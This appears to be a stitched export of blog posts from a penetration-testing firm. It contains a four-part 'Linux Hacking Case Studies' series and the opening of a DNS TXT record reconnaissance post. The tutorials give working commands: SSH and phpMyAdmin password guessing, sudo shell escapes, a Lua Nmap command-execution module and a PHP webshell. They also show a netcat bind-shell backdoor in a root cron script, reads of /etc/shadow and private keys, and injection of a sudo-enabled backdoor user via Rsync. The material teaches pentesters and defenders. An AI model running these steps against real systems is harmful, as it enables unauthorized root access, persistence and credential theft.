In this scenario let’s assume we’re going to test for common user name and password combinations.  That means we'll need a file containing a list of users and a file containing a list of passwords.  Kali ships with some good word lists that provide coverage for common user names and passwords.  Many can be found in the /usr/share/wordlists/.

Wordlists

While those can be handy, for this scenario we're going to create a few small custom lists.

Create users.txt File Containing:

echo user >> users.txt
echo root >> users.txt
echo test >> users.txt

Create passwords.txt File Containing:

echo Password >> passwords.txt
echo Password1 >> passwords.txt
echo toor >> passwords.txt
echo test >> passwords.txt

Password Guessing

Metasploit has modules that can be used to perform online dictionary attacks for most management protocols.  Most of those modules use the protocol_login naming standard. Example: ssh_login . Below is an example of the ssh_login module usage.

msfconsole
spool /root/ssh_login.log
use auxiliary/scanner/ssh/ssh_login
set USER_AS_PASS TRUE
set USER_FILE /root/users.txt
set PASS_FILE /root/password.txt
set rhosts file:///root/ssh.txt
set threads 100
set verbose TRUE
show options
run

Below is what it should look like if you successfully guess a password.

Guessedsshpassword

Here is a quick video example that shows the process of guessing passwords and gaining initial access with Metasploit.

Once you have identified a valid password you can also login using any ssh client.

Sudo


Viewing Sudoers Execution Options

There are a lot of tools like Metasploit, LinEnum, Lynis, LinuxPrivCheck, UnixPrivsEsc, etc that can be used to help identify weak configurations that could be leveraged for privilege escalation, but we are going to focus on insecure sudoers configurations.

Sudoers is configuration file in Linux that defines what commands can be run as what user.  It’s also commonly used to define commands that can be run as root by non-root users.

The sudo command below can be used to see what commands our user can run as root.

sudo -l

Sudo
In this scenario, our user has the ability to run any command as root, but we’ll experiment with a few different command examples.

Exploiting Sudo sh

Unfortunately, we have seen this in a handful of real environments.  Allowing users to execute “sh” or any other shell through sudo provides full root access to the system.  Below is a basic example of dropping into a “sh” shell using sudo.

sudo sh
Sudo


Exploiting Sudo VI

VI is a text editor that's installed by default in most Linux distros.  It’s popular with lots of developers. As a result, it’s semi-common to see developers provided with the ability to execute VI through sudo to facilitate the modification of privileged configurations files used in development environments.  Having the ability to modify any file on the system has its own risks, but VI actually has a built-in function that allows the execution of arbitrary commands.  That means, if you provided a user sudo access to VI, then you have effectively provided them with root access to your server.

Below is a command example:

vi
ESC (press esc key)
:!whoami

Below are some example screenshots showing the process.

Vibreakout

Exploiting Sudo Python

People also love Python.  It’s a scripting language used in every industry vertical and isn’t going away any time soon. It’s actually pretty rare to see Python or other programming engines broadly allowed to execute through sudo, but we have seen it a few times so I thought I’d share an example here.  Python, like most robust scripting and programming languages, supports arbitrary command execution capabilities by default.

Below is a basic command example and a quick video for the sake of illustration:

sudo python –c “import os;os.system(‘whoami’)”

Here are a few quick video examples.

Exploiting Sudo Nmap

Most privilege escalation involves manipulating an application running as a higher privilege into running your code or commands.  One of the many techniques used by attackers is to simply leverage the native functionality of the target application. One common theme we see across many applications is the ability to create and load custom modules, plug-ins, or add-ons.

For the sake of this scenario, let's assume we can run Nmap using sudo and now we want to use it's functionality to execute operating system commands.

When I see that an application like Nmap can be run through sudo, I typically follow a process similar to the one below:

  1. Does Nmap allow me to directly execute os commands?
    No (only in old versions using the -–interactive flag and !whoami)
  2. Does Nmap allow me to extend its functionality?
    Yes, it allows users to load and execute custom .nse modules.
  3. What programming language are the .nse modules written in?
    Nmap .nse modules use the LUA scripting engine.
  4. Does the LUA scripting engine support OS command execution?
    Yep. So let’s build a LUA module to execute operating system commands. It’s important to note that we could potentially write a module to execute shell code or call specific APIs, but in this example we'll keep it simple.

Let's assume at this point you spent a little time reviewing existing Nmap modules/LUA capabilities and developed the following .nse module.

--- SAMPLE SCRIPT
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local command  = stdnse.get_script_args(SCRIPT_NAME .. ".command") or nil
print("Command Output:")
local t = os.execute(command)
description = [[This is a basic script for executing os commands through a Nmap nse module (lua script).]]
---
-- @usage
-- nmap --script=./exec.nse --script-args='command=whoami'
-- @output
-- Output:
-- root
-- @args command
author = "Scott Sutherland"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "discovery", "safe"}
portrule = shortport.http
action = function(host,port)   
end

Once the module is copied to the target system, you can then run your custom module through Nmap. Below you can see the module successfully runs as our unprivileged user.

nmap --script=./exec --script-args='command=whoami'
Sudo
nmap --script=./exec --script-args='command=cat /etc/shadow'
Sudo

Now, you can see we're able to run arbitrary commands in the root user's context, when running our new Nmap module through sudo.

So that’s the Nmap example. Also, for the fun of it, we occasionally configure ncat in sudoers when hosting CTFs, but to be honest I've never seen that in the real world. Either way, the video below shows both the Nmap and ncat scenarios.

Wrap Up

In this blog we talked about different ways to approach SSH password guessing and attacking sudo applications. I hope it was useful information for those new the security community.  Good luck and hack responsibly!

[post_title] => Linux Hacking Case Studies Part 4: Sudo Horror Stories [post_excerpt] => This blog will cover different ways to approach SSH password guessing and attacking sudo applications to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-4-sudo-horror-stories [to_ping] => [pinged] => [post_modified] => 2022-04-04 10:01:32 [post_modified_gmt] => 2022-04-04 15:01:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11375 [menu_order] => 398 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [23] => WP_Post Object ( [ID] => 11333 [post_author] => 17 [post_date] => 2020-03-25 07:00:52 [post_date_gmt] => 2020-03-25 07:00:52 [post_content] =>

This blog will walk-through how to attack insecure phpMyAdmin configurations and world writable files to gain a root shell on a Linux system. This case study commonly makes appearances in CTFs, but the general approach for attacking phpMyAdmin can be applied to many web applications. This should be a fun walk-through for people new to penetration testing, or those looking for a phpMyAdmin attack refresher.

This is the third of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.

Below are links to the first two blogs in the series:

Below is an overview of what will be covered in this blog:

What is phpMyAdmin?

phpMyAdmin is a web application that can be used to manage local MySQL databases. It’s commonly found in environments of all sizes and occasionally accessible directly from the internet. It's often used as part of open source projects and as a result some administrators don't realize that it's been installed in their environment. Developers also use it to temporarily spin up/down basic test environments, and we commonly see those turn into permanently unmanaged installations on corporate networks. Since we see phpMyAdmin so often, we thought it would be worth sharing a basic overview of how to use it to get a foothold on a system.
To get started, let's talk about findings phpMyAdmin instances.

Accessing NATed Environments

At the risk of adding unnecessary complexity to this scenario, we're going to assume that all of our tests are being conducted from a system that's in a NATed environment.  Meaning that we're pretending to connect to a SSH server that is exposed to the internet through a firewall, but the environment we're attacking is on the other side of the firewall.

Finding PHPMyAdmin

phpMyAdmin is a web application that’s usually hosted by Apache, but it can be hosted by other web servers.  Sometimes it’s installed in the web root directory,  but more commonly we see it installed off of the /phpMyAdmin path. For example, https://server/phpMyAdmin.

With this knowledge let's start searching for web serves that might be hosting phpMyAdmin instances using our favorite port scanner Nmap:

nmap -sT -sV -p80,443 192.168.1.0/24 -oA phpMyAdmin_scan

Next we can quickly search the phpMyAdmin_scan.gnmap output file for open ports with the command below:

grep -i "open" phpMyAdmin_scan.gnmap


We can see a few Apache instances. We can now target those to determine if phpMyAdmin is being hosted on the webroot or /phpMyAdmin path.

Since we are SSHing into a NATed environment we are going to forward port 80 through an SSH tunnel to access the web server hosted on 192.168.1.171.  In most cases you wont have to do any port forwarding, but I thought it would be fun to cover the scenario. A detailed overview of SSH tunneling and SOCKS proxies are out of scope for this blog, but below is my attempt to illustrate what we're doing.

Tunnel

Below are a couple of options for SSH tunnling to the target web server.

Linux SSH Client

ssh pentest@ssh.servers.com -L 2222:192.168.1.171:80

Windows PuTTY Client

Once port forwarding is configured, we're able to access phpMyAdmin by navigating to https://127.0.0.1:2222/phpmyadmin in our local web browser.

Dictionary Attacks against PHPMyAdmin

Now that we've found a phpMyAdmin instance the next step is usually to test for default credentials, which are root:[blank].   For the sake of this lab we'll assume the default has been changed, but all is not lost.  From here we can conduct a basic dictionary attack to test for common user/password combinations without causing trouble.  However, you should always research the web application you're performing dictionary attacks against to ensure that you don't cause account lockouts.

There are a lot of great word lists out there, but for the sake of this scenario we kept it simple with the list below.

User List:

echo root >> /tmp/users.txt
echo admin >> /tmp/users.txt
echo user >> /tmp/users.txt

Password List:

echo password >> /tmp/passwords.txt
echo Password >> /tmp/passwords.txt

You can use a tool like Burp Intruder to conduct dictionary attacks against phpMyAdmin (and other web applications), but a nice article is already available on the topic here.  So to show an alternative we'll use Metasploit since it has a module built for the task.  Below are some commands to get you started.

Note: Metasploit is installed on the Kali Linux distribution by default.

msfconsole
use auxiliary/scanner/http/phpMyAdmin_login
set rhosts 192.168.1.171
set USER_AS_PASS true
set targeturi /phpMyAdmin/index.php
set user_file /tmp/users.txt
set pass_file /tmp/passwords.txt
run

Below is a screenshot of what a successful dictionary attack looks like.

Bf

If the dictionary attack discovers valid credentials, you're ready to login and move onto the next step. Below is a short video showing the dictionary attack process using Metasploit.

Uploading WebShells through PHPMyAdmin

Now that we've guessed the password, the goal is to determine if there is any functionality that may allow us to execute operating system commands on the server.  MySQL supports user defined functions that could be used, but instead we're going to write a webshell to the webroot using the OUTFILE function.

Note: In most multi-tiered environments writing a webshell to the webroot through SQL injection wouldn't work, because the database and web server are not hosted on the same system. phpMyAdmin is a bit of an exception in that regard, but LAMP, WAMP, and XAMPP are other examples. It's also worth noting that in some environments the mysql services account may not have write access to the webroot or phhMyAdmin directories.

MySQL Code to Write a Webshell

To get started click the "SQL" button to view the query window.  Then execute the query below to upload the custom PHP webshell that can be used to execute commands on the operating system as the Apache service account. Remember that phpMyAdmin may not always be installed to /var/www/phpMyAdmin when executing this in real environments.

SELECT "<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET['cmd']) {​​system($_GET['cmd']);}​​ ?> </pre></BODY></HTML>"

INTO OUTFILE '/var/www/phpMyAdmin/cmd.php'

The actual code can be downloaded here, but below is screenshot showing it in context.

Uploadwebshell

The webshell should now be available at https://127.0.0.1:2222/phpMyAdmin/cmd.php.  With that in hand we can start issuing OS commands and begin privilege escalation.
Below are a few commands to start with:

whoami 
ls –al
ls /
Ls

Below is a quick video illustrating the process.

Note: When you're all done with your webshell make sure to remove it.  Also, consider adding authentication to your webshells so you're not opening up holes in client environments.

Locating World Writable Files

World-writable files and folders can be written to by any user.  They aren’t implicitly bad, but when those files are directly or indirectly executed by the root user they can be used to escalate privileges.

Finding World-Writable Files

Below is the command we'll run through our webshell to locate potentially exploitable world writable files.

find / -maxdepth 3 -type d -perm -777 2>/dev/null
Ww A

From here we can start exploring some of the affected files and looking for potentially exploitable targets.

Exploiting a World Writable Root Cron Job Script

In our example below, the /scripts/ directory is world-writable.  It appears to contain a script that is run by the a root cron job.  While this isn’t incredibly common, we have seen it in the wild.  The general idea can be applied to sudo scripts as well.  There are a lot of things we could write to the root cron job script, but for fun we are going to add a line to the script that will start a netcat listener as root.  Then we can connect to the listener from our Linux system.

Display Directory Listing for Scripts

ls /scripts
cat /scripts/rootcron.sh
Scriptdirectory

Add Netcat Backdoor to Root’s Crontab Script

echo "nc -l -p12345 -e /usr/bin/sh& 2>/dev/null" >> /scripts/rootcron.sh
cat /scripts/rootcron.sh
Writetoscript

You’ll have to wait for the cron job to trigger, but after that you should be able to connect the netcat backdoor listening on port 12345 from the Linux system.

Below are a few commands you might want to try once connected:

nc 192.168.1.171 12345
whoami
pwd
cat /etc/shadow
w
Rootshell

I acknowledge that this seems like an exaggerated scenario, but sometimes reality is stranger than fiction. While this isn’t a common occurrence we have seen very similar scenarios during real penetration tests.  For scenarios that require a reverse shell instead of a bind shell, pentestmonkey.net has a few documented options here.   However, below is a quick video showing the netcat backdoor installation and access.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerable phpMyAdmin installation and a world writable script being executed by a root cron job . While there are many ways to reach the same end, I think the moral of this story is that web admin interfaces can be soft targets, and often support functionality that can lead to command execution.  Also, performing web application discovery and maintenance is an important part of vulnerability management that is often overlooked. Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured web platforms like phpMyAdmin in their environments. Good luck and hack responsibly!

[post_title] => Linux Hacking Case Studies Part 3: phpMyAdmin [post_excerpt] => This blog will walkthrough how to attack insecure phpMyAdmin configurations and world writable files to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-3-phpmyadmin [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:59:03 [post_modified_gmt] => 2021-06-08 21:59:03 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11333 [menu_order] => 400 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [24] => WP_Post Object ( [ID] => 11309 [post_author] => 17 [post_date] => 2020-03-24 07:00:52 [post_date_gmt] => 2020-03-24 07:00:52 [post_content] =>

This blog will walk through how to attack insecure NFS exports and setuid configurations in order to gain a root shell on a Linux system. This should be a fun overview for people new to penetration testing, or those looking for a NFS refresher. This is the second of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.  The first blog focused on attacking Rsync and can be found here.

Below is an overview of what will be covered in this blog:

What is NFS and Why Should I Care?

Network File System (NFS) is a clear text protocol that is used to transfer files between systems. So what’s the problem? Insecurely configured NFS servers are found during our internal network penetration tests about half of the time. The weak configurations often provide unauthorized access to sensitive data and sometimes the means to obtain a shell on the system. As you might imagine, the access we get is largely dependent on the NFS configuration.

Remotely accessing directories shared through NFS exports requires two things, mount access and file access.

  1. Mount access can be restricted by hostname or IP in /etc/exports, but in many cases no restrictions are applied.  It's also worth noting that IP and hostnames are easy to impersonate (assuming you know what to impersonate).
  2. File access is made possible by configuring exports in /etc/exports and labeling them as readable/writable. File access is then restricted by the connecting user's UID, which can be spoofed.  However, it should be noted that there are some mitigating controls such as "root squashing", that can be enabled in /etc/exports to prevent access from a UID of 0 (root).

The Major Issue with NFS

If it’s possible to mount NFS exports, the UID can usually be manipulated on the client system to bypass file permissions configured on the directory being made available via the NFS export. Access could also be accidentally given if the UID on the file and the UID of the connecting user are the same.

Below is a overview of how unintended access can occur:

  1. On “Server 1” there is a user named “user1” with a UID of 1111.
  2. User1 creates a file named “secret” that is only accessible to themselves and root using a command like “chmod 600 secret”.
  3. A read/write NFS export is then created on Server1 with no IP restrictions that maps to the directory containing user1’s secret file.
  4. On a separate Linux Client System, there is a user named “user2” that also has a UID of 1111.   When user2 mounts the NFS export hosted by Server1, they can read the secret file, because their UID matches the UID of the secret file’s owner (user1 on server1).

Below is an attempt at illustrating the scenario.

Nfs

Finding NFS Servers

NFS listens on UDP/TCP ports 111 and 2049.  Use common tools like nmap identify open NFS ports.

nmap -sS -pT:2049,111,U:2049,111 192.168.1.0/24 -oA nfs_scan
grep -i "open" nfs_scan.gnmap
Nfs

Use common tools like nmap or rpcinfo to determine the versions of NFS currently supported. This may be important later. We want to force the use of version 3 or below so we can list and impersonate the UID of the file owners. If root squashing is enabled that may be a requirement for file access.

Enumerate support NFS versions with Nmap:

nmap -sV -p111,2049 192.168.1.171

Enumerate support NFS versions with rpcinfo:

apt-get install nfs-client
rpcinfo -p 192.168.1.171
Nfs

Below is a short video that shows the NFS server discovery process.

Enumerating NFS Exports

Now we want to list the available NFS exports on the remote server using Metasploit or showmount.

Metasploit example:

root@kali:~# msfconsole
msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set rhosts 192.168.1.171
msf auxiliary(nfsmount) > run
Nfs

Showmount example:

apt-get install samba
showmount -e 192.168.1.171
Nfs

Mounting NFS Exports

Now we want to mount the available NFS exports while running as root. Be sure to use the “-o vers=3” flag to ensure that you can view the UIDs of the file owners.  Below are some options for mounting the export.

mkdir demo
mount -o vers=3 192.168.1.171:/home demo
mount -o vers=3 192.168.1.222:/home demo -o nolock

or

mount -t nfs -o vers=3 192.168.1.171:/home demo

or

mount -t nfs4 -o proto=tcp,port=2049 192.168.1.171:/home demo
Nfs

Viewing UIDs of NFS Exported Directories and Files

If you have full access to everything then root squashing may not be enabled. However, if you get access denied messages, then you’ll have to impersonate the UID of the file owner and remount the NFS export to get access (not covered in this blog).

List UIDs using mounted drive:

ls -an
Nfs

List UIDs using nmap:

nmap --script=nfs-ls 192.168.1.171 -p 111
Nfs

Searching for Passwords and Private Keys (User Access)

Alrighty, let’s assume you were able to access the NFS with root or another user.  Now it’s time to try to find passwords and keys to access the remote server.  Private keys are typically found in /home/<user>/.ssh directories, but passwords are often all over the place.

Find files with “Password” in the name:

cd demo
find ./ -name "*password*"
cat ./test/password.txt
Nfs

Find private keys in .ssh directories:

mount 192.168.1.222:/ demo2/
cd demo2
find ./ -name "id_rsa"
cat ./root/.ssh/id_rsa
Nfs

Below is a short via showing the whole mounting and file searching process.

Targeting Setuid (Getting Root Access)

Now that we have an interactive shell as a least privilege user (test), there are lots of privilege escalation paths we could take, but let's focus on setuid binaries for this round. Binaries can be configured with the setuid flag, which allows users to execute them as the binary's owner.  Similarly, binaries configured with the setguid flag, which allow users to execute the flag binary as the group associated with the file.  This can be a good and bad thing for system administrators.

  • The Good news is that setuid binaries can be used to safely execute privileged commands such as passwd.
  • The Bad news is that setuid binaries can often be used for privilege escalation if they are owned by root and allow direct execution of arbitrary commands or indirect execution of arbitrary commands through plugins/modules.

Below are commands that can be used to search for setuid and setguid binaries.

Find Setuid Binaries

find / -perm -u=s -type f 2>/dev/null

Find Setguid Binaries

find / -perm -g=s -type f 2>/dev/null

Below is an example screenshot you might encounter during a pentest.

Nfs

Once again, the goal is usually to get the binary to execute arbitrary code as root for you. In real world scenarios you'll likely have to do a little research or reversing of target setuid binaries in order to determine the best way to do that. In our case, the /home/test/exec binary allows us to directly execute OS commands as root. The source code for the example application can be found at https://github.com/nullbind/Other-Projects/blob/master/random/exec.c.

Below are the sample commands and a screenshot:

cd /home/test/
./exec
whoami
Nfs

As you can see from the image above, it was possible to execute arbitrary commands as root without too much effort. Below is a video showing the whole setuid exploitation process in action.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerable NFS export and insecure setuid binary . While there are many ways to obtain the same end, I think the moral of the story is to make sure that all network share types are configured with least privilege to help prevent unauthorized access to data and systems. Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured NFS servers. Good luck and hack responsibly!

[post_title] => Linux Hacking Case Studies Part 2: NFS [post_excerpt] => This blog will walk through how to attack insecure NFS exports and setuid configurations in order to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-2-nfs [to_ping] => [pinged] => [post_modified] => 2022-04-01 14:23:33 [post_modified_gmt] => 2022-04-01 19:23:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11309 [menu_order] => 401 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [25] => WP_Post Object ( [ID] => 11299 [post_author] => 17 [post_date] => 2020-03-23 07:00:05 [post_date_gmt] => 2020-03-23 07:00:05 [post_content] =>

This blog will walk through how to attack insecure Rsync configurations in order to gain a root shell on a Linux system. This should be a fun walkthrough for people new to penetration testing, or those looking for a Rsync refresher. This will be the first of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.

Below is an overview of what will be covered in this blog:

What is RSYNC and Why Should I Care?

Rsync is a utility for transferring and synchronizing files between two servers (usually Linux).  It determines synchronization by checking file sizes and timestamps. So what's the problem?
Insecurely configured Rsync servers are found during our network penetration tests about a third of the time. The weak configurations often provide unauthorized access to sensitive data, and sometimes the means to obtain a shell on the system. As you might imagine, the access we get is largely dependent on the Rsync configuration.

Remotely accessing directories shared through Rsync requires two things, file share access and file permissions.

  1. File Share Access can be defined in /etc/Rsyncd.conf to provide anonymous or authenticated access.
  2. File Permissions can also be defined in /etc/Rsyncd.conf by defining the user that the Rsync service will run as. If Rsync is configured to run as root, then anyone allowed to connect can access the shared files with the privileges of the root user.

Below is an example of Rsyncd.conf file that allows anonymous root access to the entire file system:

motd file = /etc/Rsyncd.motd
lock file = /var/run/Rsync.lock
log file = /var/log/Rsyncd.log
pid file = /var/run/Rsyncd.pid

[files]
path = /
comment = Remote file share.
uid = 0
gid = 0
read only = no
list = yes

Finding RSYNC Servers

By default, the Rsync service listens on port 873. It’s often found configured without authentication or IP restrictions. You can discover Rsync services using tools like nmap.

nmap -sS -sV -p873 192.168.1.0/24 –oA Rsync_scan
grep –i "open" Rsync_scan.gnmap
Rsync

Enumerating RSYNC Shares

Below are commands that can be used to list the available directories and files.

List directory

rsync 192.168.1.171::

List sub directory contents

rsync 192.168.1.171::files

List directories and files recursively

rsync -r 192.168.1.171::files/tmp/
Rsync

Downloading Files via RSYNC

Below are commands that can be used to download the identified files via Rsync.  This makes it easy to pull down files containing passwords and sensitive data.

Download files

rsync 192.168.1.171::files/home/test/mypassword.txt .

Download folders

rsync -r 192.168.1.171::files/home/test/
Rsync

Uploading Files via RSYNC

Below are commands that can be used to upload files using Rsync.  This can be handy for dropping scripts and binaries into folder locations where they will be automatically executed.

Upload files

rsync ./myfile.txt 192.168.1.171::files/home/test

Upload folders

rsync -r ./myfolder 192.168.1.171::files/home/test
Rsync

Creating a New User through Rsync

If Rsync is configured to run as root and is anonymously accessible, it’s possible to create a new privileged Linux user by modifying the shadow, passwd, group, and sudoers files directly.

Note: The same general approach can be used for any vulnerability that provides full write access to the OS. A few other examples include NFS exports and uploading web shells running as root.

Creating the Home Directory
Let’s start by creating our new user’s home directory.

# Create local work directories
mkdir demo
mkdir backup
cd demo

# Create new user’s home directory
mkdir ./myuser
rsync -r ./myuser 192.168.1.171::files/home

Create the Shadow File Entry
The /etc/shadow file is the Linux password file that contains user information such as home directories and encrypted passwords. It is only accessible by root.

To inject a new user entry via Rsync you’ll have to:

  1. Generate a password.
  2. Create the line to inject.
  3. Download /etc/shadow. (and backup)
  4. Append the new user to the end of /etc/shadow
  5. Upload / Overwrite the existing /etc/shadow

Note: Make sure to create a new user that doesn’t already exist on the system. ;)

Create Encrypted Password:

openssl passwd -crypt password123

Add New User Entry to /etc/shadow:

rsync -R 192.168.1.171::files/etc/shadow .
cp ./etc/shadow ../backup
echo "myuser:MjHKz4C0Z0VCI:17861:0:99999:7:::" >> ./etc/shadow
rsync ./etc/shadow 192.168.1.171::files/etc/

Create Passwd File Entry
The /etc/passwd file is used to keep track of registered users that have access to the system. It does not contain encrypted password. It can be read by all users.

To inject a new user entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/passwd. (and back it up so you can restore state later)
  3. Append the new user entry to the end of passwd.
  4. Upload / Overwrite the existing /etc/passwd

Note: Feel free to change to uid, but make sure it matches the value set in the /etc/group file. :) In this case the UID/GUID are 1021.

Add New User Entry to /etc/passwd:

rsync -R 192.168.1.171::files/etc/passwd .
cp ./etc/passwd ../backup
echo "myuser:x:1021:1021::/home/myuser:/bin/bash" >> ./etc/passwd
rsync ./etc/passwd 192.168.1.171::files/etc/

Create the Group File Entry
The /etc/group file is used to keep track of registered group information on the system. It does not contain encrypted password. It can be read by all users.

To inject a new user entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/group. (and backup, just in case)
  3. Append the new user entry to the end of group.
  4. Upload / Overwrite the existing /etc/group file.

Note: Feel free to change to uid, but make sure it matches the value set in the /etc/passwd file. :) In this case the UID/GUID are 1021.

Add New User Entry to /etc/group:

rsync -R 192.168.1.171::files/etc/group .
cp ./etc/group ../backup
echo "myuser:x:1021:" >> ./etc/group
rsync ./etc/group 192.168.1.171::files/etc/

Create Sudoers File Entry
The /etc/sudoers file contains a list of users that are allowed to run commands as root using the sudo command. It can only be read by root. We are going to modify it to allow the new user to execute any command through sudo.

To inject a entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/sudoers. (and backup, just in case)
  3. Append the new user entry to the end of sudoers.
  4. Upload / Overwrite the existing /etc/sudoers file.

Add New User Entry to /etc/sudoers:

rsync -R 192.168.1.171::files/etc/sudoers .
cp ./etc/sudoers ../backup
echo "myuser ALL=(ALL) NOPASSWD:ALL" >> ./etc/sudoers   
rsync ./etc/sudoers 192.168.1.171::files/etc/

Now you can simply log into the server via SSH using your newly created user and sudo sh to root!

Attacking Rsync Demo Video

Below is a video created in a lab environment that shows the process of identifying and exploiting an insecurely configured Rsync server to gain a root shell. While it see too simple to be true, it is based on configurations exploited during real penetration tests.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerability that provided write access.  While there are many ways to obtain the same end, I think the moral of the story is to make sure that all network share types are configured with least privilege to help prevent unauthorized access to data and systems.   Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured Rsync servers.  Good luck and hack responsibly!

The next blog in the series focuses on NFS and setuid binaries, it can be found here.

References

[post_title] => Linux Hacking Case Studies Part 1: Rsync [post_excerpt] => This blog will walk through how to attack insecure Rsync configurations in order to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-1-rsync [to_ping] => [pinged] => [post_modified] => 2022-04-04 10:01:30 [post_modified_gmt] => 2022-04-04 15:01:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11299 [menu_order] => 403 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [26] => WP_Post Object ( [ID] => 17444 [post_author] => 53 [post_date] => 2020-02-23 15:37:45 [post_date_gmt] => 2020-02-23 15:37:45 [post_content] =>

Learn about one of the open source projects from the NetSPI toolbox called PowerUpSQL. PowerUpSQL can be used to blindly inventory SQL Servers, audit them for common security misconfigurations, and exploit identified vulnerabilities during pentests and red teams operations. PowerUpSQL is an open source tool available on GitHub, learn more at https://powerupsql.com/.

For more open source projects from NetSPI check out https://github.com/netspi.

https://youtu.be/7sT1OQEtXlg
[post_title] => Attacking Modern Environments through SQL Server with PowerUpSQL [post_excerpt] => Learn about one of the open source projects from the NetSPI toolbox called PowerUpSQL. PowerUpSQL can be used to blindly inventory SQL Servers, audit them for common security misconfigurations, and exploit identified vulnerabilities during pentests and red teams operations. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-modern-environments-through-sql-server-with-powerupsql [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:16:55 [post_modified_gmt] => 2022-11-11 18:16:55 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17444 [menu_order] => 72 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [27] => WP_Post Object ( [ID] => 11219 [post_author] => 17 [post_date] => 2019-11-18 07:00:30 [post_date_gmt] => 2019-11-18 07:00:30 [post_content] => DNS reconnaissance is an important part of most external network penetration tests and red team operations. Within DNS reconnaissance there are many areas of focus, but I thought it would be fun to dig into DNS TXT records that were created to verify domain ownership. They’re pretty common and can reveal useful information about the technologies and services being used by the target company. In this blog I’ll walkthrough how domain validation typically works, review the results of my mini DNS research project, and share a PowerShell script that can be used to fingerprint online service providers via DNS TXT records. This should be useful to red teams and internal security teams looking for ways to reduce their internet facing footprint. Below is an overview of the content if you want to skip ahead:

Domain Ownership Validation Process

When companies or individuals want to use an online service that is tied to one of their domains, the ownership of that domain needs to be verified.  Depending on the service provider, the process is commonly referred to as “domain validation” or “domain verification”. Below is an outline of how that process typically works:
  1. The company creates an account with the online service provider.
  2. The company provides the online service provider with the domain name that needs to be verified.
  3. The online service provider sends an email containing a unique domain validation token (text value) to the company’s registered contact for the domain.
  4. The company then creates a DNS TXT record for their domain containing the domain validation token they received via email from the online service provider.
  5. The online service provider validates domain ownership by performing a DNS query to verify that the TXT record containing the domain validation token has been created.
  6. In most cases, once the domain validation process is complete, the company can remove the DNS TXT record containing the domain validation token.
It’s really that last step that everyone seems to forget to do, and that’s why simple DNS queries can be so useful for gaining insight into what online service providers companies are using. Note: The domain validation process doesn’t always require a DNS TXT entry.  Some online service providers simply request that you upload of a text file containing the domain validation token to the webroot of the domain’s website.  For example, https://mywebsite.com/validation_12345.txt.  Google dorking can be a handy way to find those instances if you know what you’re looking for, but for now let’s stay focused on DNS records.

Analyzing TXT Records for a Million Domains

Our team has been gleaning information about online service providers from DNS TXT records for years,  but I wanted a broader understanding of what was out there.  So began my journey to identify some domain validation token trends.

Choosing a Domain Sample

I started by simply grabbing DNS TXT records for the Alexa top 1 million sites.  I used a slightly older list, but for those looking to mine that information on a reoccurring basis, Amazon has a service you can use at https://aws.amazon.com/alexa-top-sites/.

Tools for Querying TXT Records

DNS TXT records can be easily viewed with tools like nslookup, host, dig, massdns, or security focused tools like dnsrecon .  I ended up using a basic PowerShell script to make all of the DNS requests, because PowerShell lets me be lazy. 😊  It was a bit slow, but it still took less than a day to collect all of the TXT records from 1 million sites. Below is the basic collection script I used.
# Import list of domains
$Domains = gc c:tempdomains.txt

# Get TXT records for domains
$txtlist = $Domains |
ForEach-Object{
    Resolve-DnsName -Type TXT $_ -Verbose
}

# Filter out most spf records
$Results = $txtlist  | where type -like txt |  select name,type,strings | 
ForEach-Object {
    $myname = $_.name
    $_.strings | 
    foreach {
        
        $object = New-Object psobject
        $object | add-member noteproperty name $myname
        $object | add-member noteproperty txtstring $_
        if($_ -notlike "v=spf*")
        {
            $object
        }
    }
} | Sort-Object name

# Save results to CSV
$Results | Export-Csv -NoTypeInformation dnstxt-records.csv

# Return results to console
$Results

Quick and Dirty Analysis of Records

Below is the high level process I used after the information was collected:
  1. Removed remaining SPF records
  2. Parsed key value pairs
  3. Sorted and grouped similar keys
  4. Identified the service providers through Google dorking and documentation review
  5. Removed keys that were completely unique and couldn’t be easily attributed to a specific service provider
